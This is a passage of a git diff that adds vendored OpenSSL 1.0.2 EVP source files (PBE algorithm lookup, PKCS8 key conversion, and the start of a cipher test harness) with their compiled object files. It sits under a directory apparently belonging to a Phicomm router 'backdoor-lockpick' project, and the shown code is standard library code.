+int EVP_PBE_alg_add_type(int pbe_type, int pbe_nid, int cipher_nid,
+                         int md_nid, EVP_PBE_KEYGEN *keygen)
+{
+    EVP_PBE_CTL *pbe_tmp;
+    if (!pbe_algs)
+        pbe_algs = sk_EVP_PBE_CTL_new(pbe_cmp);
+    if (!(pbe_tmp = (EVP_PBE_CTL *)OPENSSL_malloc(sizeof(EVP_PBE_CTL)))) {
+        EVPerr(EVP_F_EVP_PBE_ALG_ADD_TYPE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    pbe_tmp->pbe_type = pbe_type;
+    pbe_tmp->pbe_nid = pbe_nid;
+    pbe_tmp->cipher_nid = cipher_nid;
+    pbe_tmp->md_nid = md_nid;
+    pbe_tmp->keygen = keygen;
+
+    sk_EVP_PBE_CTL_push(pbe_algs, pbe_tmp);
+    return 1;
+}
+
+int EVP_PBE_alg_add(int nid, const EVP_CIPHER *cipher, const EVP_MD *md,
+                    EVP_PBE_KEYGEN *keygen)
+{
+    int cipher_nid, md_nid;
+    if (cipher)
+        cipher_nid = EVP_CIPHER_nid(cipher);
+    else
+        cipher_nid = -1;
+    if (md)
+        md_nid = EVP_MD_type(md);
+    else
+        md_nid = -1;
+
+    return EVP_PBE_alg_add_type(EVP_PBE_TYPE_OUTER, nid,
+                                cipher_nid, md_nid, keygen);
+}
+
+int EVP_PBE_find(int type, int pbe_nid,
+                 int *pcnid, int *pmnid, EVP_PBE_KEYGEN **pkeygen)
+{
+    EVP_PBE_CTL *pbetmp = NULL, pbelu;
+    int i;
+    if (pbe_nid == NID_undef)
+        return 0;
+
+    pbelu.pbe_type = type;
+    pbelu.pbe_nid = pbe_nid;
+
+    if (pbe_algs) {
+        i = sk_EVP_PBE_CTL_find(pbe_algs, &pbelu);
+        if (i != -1)
+            pbetmp = sk_EVP_PBE_CTL_value(pbe_algs, i);
+    }
+    if (pbetmp == NULL) {
+        pbetmp = OBJ_bsearch_pbe2(&pbelu, builtin_pbe,
+                                  sizeof(builtin_pbe) / sizeof(EVP_PBE_CTL));
+    }
+    if (pbetmp == NULL)
+        return 0;
+    if (pcnid)
+        *pcnid = pbetmp->cipher_nid;
+    if (pmnid)
+        *pmnid = pbetmp->md_nid;
+    if (pkeygen)
+        *pkeygen = pbetmp->keygen;
+    return 1;
+}
+
+static void free_evp_pbe_ctl(EVP_PBE_CTL *pbe)
+{
+    OPENSSL_freeFunc(pbe);
+}
+
+void EVP_PBE_cleanup(void)
+{
+    sk_EVP_PBE_CTL_pop_free(pbe_algs, free_evp_pbe_ctl);
+    pbe_algs = NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pbe.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pbe.o
new file mode 100644
index 0000000000000000000000000000000000000000..fa41df1c8cf2217a1116fc7641cfa6435aa8c8b3
GIT binary patch
literal 6304
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
L)ST@4({2A>*sU+m

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pkey.c
new file mode 100644
index 0000000..6a45629
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pkey.c
@@ -0,0 +1,229 @@
+/* evp_pkey.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/rand.h>
+#include "asn1_locl.h"
+
+/* Extract a private key from a PKCS8 structure */
+
+EVP_PKEY *EVP_PKCS82PKEY(PKCS8_PRIV_KEY_INFO *p8)
+{
+    EVP_PKEY *pkey = NULL;
+    ASN1_OBJECT *algoid;
+    char obj_tmp[80];
+
+    if (!PKCS8_pkey_get0(&algoid, NULL, NULL, NULL, p8))
+        return NULL;
+
+    if (!(pkey = EVP_PKEY_new())) {
+        EVPerr(EVP_F_EVP_PKCS82PKEY, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (!EVP_PKEY_set_type(pkey, OBJ_obj2nid(algoid))) {
+        EVPerr(EVP_F_EVP_PKCS82PKEY, EVP_R_UNSUPPORTED_PRIVATE_KEY_ALGORITHM);
+        i2t_ASN1_OBJECT(obj_tmp, 80, algoid);
+        ERR_add_error_data(2, "TYPE=", obj_tmp);
+        goto error;
+    }
+
+    if (pkey->ameth->priv_decode) {
+        if (!pkey->ameth->priv_decode(pkey, p8)) {
+            EVPerr(EVP_F_EVP_PKCS82PKEY, EVP_R_PRIVATE_KEY_DECODE_ERROR);
+            goto error;
+        }
+    } else {
+        EVPerr(EVP_F_EVP_PKCS82PKEY, EVP_R_METHOD_NOT_SUPPORTED);
+        goto error;
+    }
+
+    return pkey;
+
+ error:
+    EVP_PKEY_free(pkey);
+    return NULL;
+}
+
+PKCS8_PRIV_KEY_INFO *EVP_PKEY2PKCS8(EVP_PKEY *pkey)
+{
+    return EVP_PKEY2PKCS8_broken(pkey, PKCS8_OK);
+}
+
+/* Turn a private key into a PKCS8 structure */
+
+PKCS8_PRIV_KEY_INFO *EVP_PKEY2PKCS8_broken(EVP_PKEY *pkey, int broken)
+{
+    PKCS8_PRIV_KEY_INFO *p8;
+
+    if (!(p8 = PKCS8_PRIV_KEY_INFO_new())) {
+        EVPerr(EVP_F_EVP_PKEY2PKCS8_BROKEN, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    p8->broken = broken;
+
+    if (pkey->ameth) {
+        if (pkey->ameth->priv_encode) {
+            if (!pkey->ameth->priv_encode(p8, pkey)) {
+                EVPerr(EVP_F_EVP_PKEY2PKCS8_BROKEN,
+                       EVP_R_PRIVATE_KEY_ENCODE_ERROR);
+                goto error;
+            }
+        } else {
+            EVPerr(EVP_F_EVP_PKEY2PKCS8_BROKEN, EVP_R_METHOD_NOT_SUPPORTED);
+            goto error;
+        }
+    } else {
+        EVPerr(EVP_F_EVP_PKEY2PKCS8_BROKEN,
+               EVP_R_UNSUPPORTED_PRIVATE_KEY_ALGORITHM);
+        goto error;
+    }
+    RAND_add(p8->pkey->value.octet_string->data,
+             p8->pkey->value.octet_string->length, 0.0);
+    return p8;
+ error:
+    PKCS8_PRIV_KEY_INFO_free(p8);
+    return NULL;
+}
+
+PKCS8_PRIV_KEY_INFO *PKCS8_set_broken(PKCS8_PRIV_KEY_INFO *p8, int broken)
+{
+    switch (broken) {
+
+    case PKCS8_OK:
+        p8->broken = PKCS8_OK;
+        return p8;
+        break;
+
+    case PKCS8_NO_OCTET:
+        p8->broken = PKCS8_NO_OCTET;
+        p8->pkey->type = V_ASN1_SEQUENCE;
+        return p8;
+        break;
+
+    default:
+        EVPerr(EVP_F_PKCS8_SET_BROKEN, EVP_R_PKCS8_UNKNOWN_BROKEN_TYPE);
+        return NULL;
+    }
+}
+
+/* EVP_PKEY attribute functions */
+
+int EVP_PKEY_get_attr_count(const EVP_PKEY *key)
+{
+    return X509at_get_attr_count(key->attributes);
+}
+
+int EVP_PKEY_get_attr_by_NID(const EVP_PKEY *key, int nid, int lastpos)
+{
+    return X509at_get_attr_by_NID(key->attributes, nid, lastpos);
+}
+
+int EVP_PKEY_get_attr_by_OBJ(const EVP_PKEY *key, ASN1_OBJECT *obj,
+                             int lastpos)
+{
+    return X509at_get_attr_by_OBJ(key->attributes, obj, lastpos);
+}
+
+X509_ATTRIBUTE *EVP_PKEY_get_attr(const EVP_PKEY *key, int loc)
+{
+    return X509at_get_attr(key->attributes, loc);
+}
+
+X509_ATTRIBUTE *EVP_PKEY_delete_attr(EVP_PKEY *key, int loc)
+{
+    return X509at_delete_attr(key->attributes, loc);
+}
+
+int EVP_PKEY_add1_attr(EVP_PKEY *key, X509_ATTRIBUTE *attr)
+{
+    if (X509at_add1_attr(&key->attributes, attr))
+        return 1;
+    return 0;
+}
+
+int EVP_PKEY_add1_attr_by_OBJ(EVP_PKEY *key,
+                              const ASN1_OBJECT *obj, int type,
+                              const unsigned char *bytes, int len)
+{
+    if (X509at_add1_attr_by_OBJ(&key->attributes, obj, type, bytes, len))
+        return 1;
+    return 0;
+}
+
+int EVP_PKEY_add1_attr_by_NID(EVP_PKEY *key,
+                              int nid, int type,
+                              const unsigned char *bytes, int len)
+{
+    if (X509at_add1_attr_by_NID(&key->attributes, nid, type, bytes, len))
+        return 1;
+    return 0;
+}
+
+int EVP_PKEY_add1_attr_by_txt(EVP_PKEY *key,
+                              const char *attrname, int type,
+                              const unsigned char *bytes, int len)
+{
+    if (X509at_add1_attr_by_txt(&key->attributes, attrname, type, bytes, len))
+        return 1;
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..06438e9d3ed639090d17d569ed274f6c67a1bffe
GIT binary patch
literal 5040
zcmb`Le{2**6vyX!MT(T`fgoo<Jhf<vcD*ekU{LPbyLJzb_H3^}5m>J6La{&YyzXJE
zMu-*S<sg93#KiynNBr>ze;7=NX-`XR_(Ov~5>50EO-KN1L?vm6!PNI=XL@sUyNOX>
zvNtoI`Mx)AW_NbBJsgQOSGZh+n~OY2iY-nF33!Y3Agu<8hb$sDYF7Oj>QpbPU#T;p
zL`1#ZspbBP=B{dEzwGPP@|COWK&<7$wL8^<mb-ElU5^%OUilhI+KA>ZXh#d#RS~tI
zUOXQHJf4D|iQBl~+8L;6`AxM{9?M<Hea50>TP&wTB~Gyu1GQCDq2-s>#&Xxk<2+O>
z_wz&rG$54|>!7qUnBE-ChikoBJ{W{dOrMtf6-Jr81X%^F0ZxN-`gW^+3hGjZpoWRF
zAz`My+FEPg<~$3IUDy}P{kSKzJG5t#E?5FrsUvrTcC!^&A*{f&Fi3F)rblx=Eg$h>
zcJ+{^Ca2kGxxR*J-dRkOr;O`^!;Y7R71Ewwj!WRH*-?P-Ra$<eDj%S^LE2A4-ZX1<
z=Gx}j*;$OF<!&CGF_+DLk%h!|_@?ILBQsTj&&cG|eE21k@$*?IXfoqzs1>K97Ix8i
zTK;h08ft08f6<6*V^da|yI@6X-YC?ZE6~XQQ%9mJ9(jV0mZql1{dJw)*&#FQ->9rr
z0`=<pEN!YUH3XEvqiZaTbE$+2mth`UEv=md9=8HAH(Y2-t%A6oZzrx1uWLp1{Hjy1
zdI8`oS)Yol+3fM2sL(vV<L<D>f2?wg=ZMQ)?eh4;9$%x!+vuqxqz+_p=5r29@Ht))
z^7xLS&sb%}J04$%X)&i4nRX#7F_%-U9>KED<J}E`QG15*MXW^ju?@Rq!!Fyfn-asZ
zt8t!Sci~UO<J|&dBd>Mfn;dw;hGR%OLun=Xeb%neZTsfKd&loysh6AH?NWv<H@*9I
zoNkS>4mW|DX=84(po~^if=^euxe2~BOKmYUmk9Hs&lWI0TzF4qdklabZ+74v4m|0=
z2Oaof2Y%9lzwN-!I`B_`<2vy9)BOVMTL=Ah2VMmaklp$$29EKsK#9ipn4j@K7^nLT
z`Y{jGugCKUjPJ83aJ%?A(}yMfh=cwl(?2EY&p7BOn0~LM|I$JK6Vvxg`WXlP0?^@n
zN0^@Od6@S~Xxq)Vp6O3Z`W6Sh&h+m|`cVfx#>IRlCH?yjdSV<(>*;=DROul~tSLYu
z+v9qCYg5ODhWOS<7tvc{ZH=Lr-qzgQ5lQHYP-85j6Dpu?`T@h_PLVEs$as!K+S~PX
z*3^wmCY2#=ja&3o_cIMc2YXp;kPREAZjPo6a<IYFLmjQE4zfs7g8C+Vdo5qRH)$q|
zPWv;4L3DlCO!oBaJ$?Q9{^Y@dxo$`olGeL3seWUKB^YmyZr5QJdbG8<jpk;FN;!?&
z9%>EiFtQYn1;Tt;WNUpOCQMvUnr24tNx=z9cCHI-Oqwz+S9g!<t<i9qoMBr%tc{%>
zahYBg78Sk5fMFUmWiArYTqIZowM10}<r*FG7SfxOa&GS-EI^3|a(fSRWNw8^Jdjfh
zSOq<~@SSrDzUa{4JBJ#6t9anze6NM6zDD2!0>}N!_4uuchH>!h;rva6V93Qd?^0^<
zB~a)3^Ni#6#8Z&-3C1zb9Ri1~OihlzP~iA&!Q=P^zD(eo1-@M1`vflL|B(a#RNy`#
z&i4YxcOcK_5%wOE^M6_34+{FX1inV#9}4^-fqyRWdVvQ8ez(B43H%;`?-KaE0zV+|
z`vq<ae6_&+P)EaVCZX*F{Vj5SULTP-KWAT;I6r4UkT^eQ3lit&={FMR=jK(3^YihR
z#Q8bsW%rlQi=TIO66fbyP~!aj+9`2<P7!5zbkIz8LuqELvX9p?#z0ar4cO`mJrR`d
z;bEd=QrJMbs;ETiNevDf@E%r%Ql_E6pD6Y8pkVC-Ls=!ANu`a9ISQ^A(CE|mXOe>k
zoA7@u{NRsMlfP7hz|ejW9|mZ%WuSfdvjQ&MBSE-C`;C2Yy~_NtiN5^H8uuXD18^ai
zzvx%W0L5VP_zwfan6mtz`l~Ev1C*k1e|cT__`D2)6V~~AoX5D2C4_rkH15aCD0K3=
zsM{t_h;_=^F5viAjC7kwoca5iA20a&^EUnq0%OYlY3AQ24JiBLxnp<#NAS=B+ra$s
z{^Pm9{rUa38yo$;!=PYsR#rnDW61s(({8EiumfyvpIXhbwZ=2i&i^bPDqt^I#oVv7
G9OQ4J)?p$5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_test.c
new file mode 100644
index 0000000..d7441ec
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_test.c
@@ -0,0 +1,596 @@
+/* Written by Ben Laurie, 2001 */
+/*
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <stdio.h>
+#include <string.h>
+
+#include "../e_os.h"
+
+#include <openssl/opensslconf.h>
+#include <openssl/evp.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/err.h>
+#include <openssl/conf.h>
+
+static void hexdump(FILE *f, const char *title, const unsigned char *s, int l)
+{
+    int n = 0;
+
+    fprintf(f, "%s", title);
+    for (; n < l; ++n) {
+        if ((n % 16) == 0)
+            fprintf(f, "\n%04x", n);
+        fprintf(f, " %02x", s[n]);
+    }
+    fprintf(f, "\n");
+}
+
+static int convert(unsigned char *s)
+{
+    unsigned char *d;
+
+    for (d = s; *s; s += 2, ++d) {
+        unsigned int n;
+
+        if (!s[1]) {
+            fprintf(stderr, "Odd number of hex digits!");
+            EXIT(4);
+        }
+        sscanf((char *)s, "%2x", &n);
+        *d = (unsigned char)n;
+    }
+    return s - d;
+}
+
+static char *sstrsep(char **string, const char *delim)
+{
+    char isdelim[256];
+    char *token = *string;
+
+    if (**string == 0)
+        return NULL;
+
+    memset(isdelim, 0, 256);
+    isdelim[0] = 1;
+
+    while (*delim) {
+        isdelim[(unsigned char)(*delim)] = 1;
+        delim++;
+    }
+
+    while (!isdelim[(unsigned char)(**string)]) {
+        (*string)++;
+    }
+
+    if (**string) {
+        **string = 0;
+        (*string)++;
+    }
+
+    return token;
+}
+
+static unsigned char *ustrsep(char **p, const char *sep)
+{
+    return (unsigned char *)sstrsep(p, sep);
+}
+
+static int test1_exit(int ec)
+{
+    EXIT(ec);
+    return (0);                 /* To keep some compilers quiet */
+}
+
+static void test1(const EVP_CIPHER *c, const unsigned char *key, int kn,
+                  const unsigned char *iv, int in,
+                  const unsigned char *plaintext, int pn,
+                  const unsigned char *ciphertext, int cn,
+                  const unsigned char *aad, int an,
+                  const unsigned char *tag, int tn, int encdec)
+{
+    EVP_CIPHER_CTX ctx;
+    unsigned char out[4096];
+    int outl, outl2, mode;
+
+    printf("Testing cipher %s%s\n", EVP_CIPHER_name(c),
+           (encdec ==
+            1 ? "(encrypt)" : (encdec ==
+                               0 ? "(decrypt)" : "(encrypt/decrypt)")));
+    hexdump(stdout, "Key", key, kn);
+    if (in)
+        hexdump(stdout, "IV", iv, in);
+    hexdump(stdout, "Plaintext", plaintext, pn);
+    hexdump(stdout, "Ciphertext", ciphertext, cn);
+    if (an)
+        hexdump(stdout, "AAD", aad, an);
+    if (tn)
+        hexdump(stdout, "Tag", tag, tn);
+    mode = EVP_CIPHER_mode(c);
+    if (kn != EVP_CIPHER_key_length(c)) {
+        fprintf(stderr, "Key length doesn't match, got %d expected %lu\n", kn,
+                (unsigned long)EVP_CIPHER_key_length(c));
+        test1_exit(5);
+    }
+    EVP_CIPHER_CTX_init(&ctx);
+    EVP_CIPHER_CTX_set_flags(&ctx, EVP_CIPHER_CTX_FLAG_WRAP_ALLOW);
+    if (encdec != 0) {
+        if (mode == EVP_CIPH_GCM_MODE) {
+            if (!EVP_EncryptInit_ex(&ctx, c, NULL, NULL, NULL)) {
+                fprintf(stderr, "EncryptInit failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(10);
+            }
+            if (!EVP_CIPHER_CTX_ctrl(&ctx, EVP_CTRL_GCM_SET_IVLEN, in, NULL)) {
+                fprintf(stderr, "IV length set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(11);
+            }
+            if (!EVP_EncryptInit_ex(&ctx, NULL, NULL, key, iv)) {
+                fprintf(stderr, "Key/IV set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(12);
+            }
+            if (an && !EVP_EncryptUpdate(&ctx, NULL, &outl, aad, an)) {
+                fprintf(stderr, "AAD set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(13);
+            }
+        } else if (mode == EVP_CIPH_CCM_MODE) {
+            if (!EVP_EncryptInit_ex(&ctx, c, NULL, NULL, NULL)) {
+                fprintf(stderr, "EncryptInit failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(10);
+            }
+            if (!EVP_CIPHER_CTX_ctrl(&ctx, EVP_CTRL_CCM_SET_IVLEN, in, NULL)) {
+                fprintf(stderr, "IV length set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(11);
+            }
+            if (!EVP_CIPHER_CTX_ctrl(&ctx, EVP_CTRL_CCM_SET_TAG, tn, NULL)) {
+                fprintf(stderr, "Tag length set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(11);
+            }
+            if (!EVP_EncryptInit_ex(&ctx, NULL, NULL, key, iv)) {
